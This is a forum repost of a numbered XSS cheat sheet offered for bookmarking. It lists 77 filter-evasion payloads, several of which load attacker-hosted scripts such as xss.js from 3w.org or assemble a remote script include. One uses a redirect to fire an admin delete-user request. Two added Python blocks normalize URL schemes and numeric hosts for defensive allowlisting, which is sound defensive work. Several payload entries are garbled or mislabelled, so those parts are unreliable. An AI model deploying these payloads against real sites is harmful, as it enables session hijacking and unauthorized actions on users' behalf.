It seems t00ls has fairly little material on XSS. I saw some good stuff and copied it over; not sure whether any of you need to bookmark it.

(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using JavaScript commands
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag with no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode tag (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection; an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Working around a character limit (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters basically have no effect domestically, since there is nowhere to make use of them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">
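Items 3 to 19 all spell the same javascript: scheme differently (case, HTML entities with and without semicolons, embedded tab/newline/CR/NUL, leading control characters), which is exactly why a substring blocklist on "javascript:" fails. As an added example that is not part of the original post, the Python below normalizes an attribute URL the way a browser does and then allowlists the scheme; the sample values are constructed to mirror those items and the vbscript: one from item 40.

```python
import html
import re
from typing import Optional

# Allowlist applied after normalization; beats blocklisting "javascript:".
ALLOWED_SCHEMES = {"http", "https", "mailto"}

# As in the WHATWG URL parser: trim leading/trailing C0 controls and spaces,
# then drop every tab, LF and CR. NUL is dropped too (old browsers ignored it).
_EDGE_CONTROLS = re.compile(r"^[\x00-\x20]+|[\x00-\x20]+$")
_INNER_IGNORED = re.compile(r"[\t\n\r\x00]")
_SCHEME = re.compile(r"^([a-z][a-z0-9+.\-]*):", re.IGNORECASE)

def url_scheme(value: str) -> Optional[str]:
    """Lower-cased scheme a browser would see, or None for a relative URL."""
    # One entity-decoding pass, as the HTML parser does for attribute values;
    # html.unescape accepts &#106; &#x6A; and the semicolon-less forms.
    decoded = html.unescape(value)
    decoded = _EDGE_CONTROLS.sub("", decoded)
    decoded = _INNER_IGNORED.sub("", decoded)
    m = _SCHEME.match(decoded)
    return m.group(1).lower() if m else None

def is_allowed_url(value: str) -> bool:
    scheme = url_scheme(value)
    return scheme is None or scheme in ALLOWED_SCHEMES

def naive_blocklist_flags(value: str) -> bool:
    """The substring check that items 3 to 19 are written to get past."""
    return "javascript:" in value.lower()

# Constructed attribute values mirroring items 3 to 19 and 40 above.
SAMPLES = {
    "plain": "javascript:alert('XSS')",
    "mixed_case": "JaVaScRiPt:alert('XSS')",
    "entities": "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')",
    "dec_nosemi": "&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058alert('XSS')",
    "hex_nosemi": "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29",
    "tab": "jav\tascript:alert('XSS');",
    "enc_tab": "jav&#x09;ascript:alert('XSS');",
    "newline": "jav\nascript:alert('XSS');",
    "nul": "java\x00script:alert('XSS')",
    "lead_meta": " &#14; javascript:alert('XSS');",
    "vbscript": "vbscript:msgbox(\"XSS\")",
    "http": "http://example.com/",
    "relative": "/images/a.png",
}
```

Run url_scheme() and is_allowed_url() over SAMPLES to see every javascript: spelling collapse to the same scheme while the naive check misses the encoded and split ones.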
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'>

(41) META with linked URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with STYLE (made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash file that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>

(56) Using ActionScript inside Flash, you can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace. The HTC file must be on the same server as your XSS carrier
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put the JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP in decimal
<A HREF="http://3232235521">XSS</A>

(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute dot for absolute DNS
<A HREF="http://www.google.com./">XSS</A>

(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
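Items 70 to 73 and 76 show that one host can be written as a single decimal integer, as hex or octal dotted parts, as a mixture, or with a trailing dot, so a host allowlist compared as a plain string is bypassed. As an added example that is not part of the original post, the Python below canonicalizes numeric hosts following the WHATWG IPv4 number rules before the comparison; the hosts checked in the usage are constructed from those items.

```python
import re
from typing import Optional

# Digit classes for each radix the WHATWG "IPv4 number parser" accepts.
_DIGITS = {16: r"[0-9a-fA-F]+", 8: r"[0-7]+", 10: r"[0-9]+"}

def _ipv4_number(part: str) -> Optional[int]:
    """One dotted part: 0x prefix is hex, a leading 0 is octal, else decimal."""
    if part[:2].lower() == "0x":
        radix, digits = 16, part[2:]
    elif len(part) >= 2 and part[0] == "0":
        radix, digits = 8, part[1:]
    else:
        radix, digits = 10, part
    if digits == "":
        return 0 if radix != 10 else None  # "0x" alone is zero; "" is not a number
    if not re.fullmatch(_DIGITS[radix], digits):
        return None
    return int(digits, radix)

def canonical_ipv4(host: str) -> Optional[str]:
    """Dotted-quad form of a numeric host (decimal, hex, octal or mixed, 1 to 4
    parts, optional trailing dot), or None if the host is not a numeric IPv4."""
    parts = host.split(".")
    if len(parts) > 1 and parts[-1] == "":  # one trailing dot is allowed
        parts.pop()
    if not 1 <= len(parts) <= 4:
        return None
    nums = [_ipv4_number(p) for p in parts]
    if any(n is None for n in nums):
        return None
    # Every part but the last is one octet; the last fills the remaining
    # octets, which is why "3232235521" on its own is a whole address.
    if any(n > 255 for n in nums[:-1]) or nums[-1] >= 256 ** (5 - len(nums)):
        return None
    value = nums[-1]
    for i, n in enumerate(nums[:-1]):
        value += n << (8 * (3 - i))
    return ".".join(str((value >> s) & 0xFF) for s in (24, 16, 8, 0))

def normalize_host(host: str) -> str:
    """Allowlist key: numeric hosts as dotted quads, names lower-cased
    with the trailing dot removed."""
    return canonical_ipv4(host) or host.lower().rstrip(".")

def host_allowed(host: str, allowlist) -> bool:
    return normalize_host(host) in allowlist
```

With the hosts from items 70 to 73, canonical_ipv4() maps "3232235521", "0xc0.0xa8.0x00.0x01" and "0300.0250.0000.0001" to "192.168.0.1" and "66.000146.0x7.147" to "66.102.7.147", so host_allowed() compares what the browser will actually connect to.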